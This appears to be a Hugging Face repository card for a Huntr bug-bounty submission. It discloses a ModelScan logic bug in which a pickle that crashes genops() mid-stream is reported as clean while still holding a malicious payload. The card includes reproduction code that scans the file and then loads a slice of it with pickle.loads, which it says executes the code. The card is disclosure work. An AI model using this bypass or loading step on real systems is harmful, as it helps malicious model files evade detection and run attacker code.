You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Scanner Bypass PoC

This is a security research submission for Huntr.

Vulnerability

ModelScan scan_pickle_bytes() logic bug: when genops() crashes mid-stream with pre-existing benign globals, the function returns total_issues=0, errors=[] — indistinguishable from a clean file — while containing a malicious payload.

File

huntr_submission.pkl — malicious pickle that bypasses ModelScan completely

Scanner result (expected vs actual)

Expected: errors=[PickleGenopsError], total_issues=0
Actual:   errors=[],                  total_issues=0  ← CLEAN result

Reproduction

from modelscan.modelscan import ModelScan
ms = ModelScan()
result = ms.scan("huntr_submission.pkl")
print(result["summary"]["total_issues"])  # → 0
print(result["errors"])                   # → []

import pickle
pickle.loads(open("huntr_submission.pkl", "rb").read().split(b"\xfe")[1])
# → executes malicious code

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support